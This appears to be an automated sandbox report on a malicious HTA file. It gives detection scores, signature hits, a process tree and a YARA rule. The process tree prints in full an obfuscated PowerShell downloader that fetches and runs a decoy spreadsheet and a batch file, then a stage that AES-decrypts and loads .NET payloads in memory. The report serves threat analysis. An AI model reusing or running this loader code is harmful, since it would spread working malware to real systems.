Analysis Report
hta.hta
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Office Outbound Connections
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7240 cmdline: mshta.exe "C:\Users\user\Desktop\hta.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True ){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- EXCEL.EXE (PID: 7500 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx" MD5: 4A871771235598812032C822E6F68F19)
- splwow64.exe (PID: 7896 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
- cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 7636 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 7828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- svchost.exe (PID: 7916 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
System Summary
Source | Author |
---|---|
 | Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) |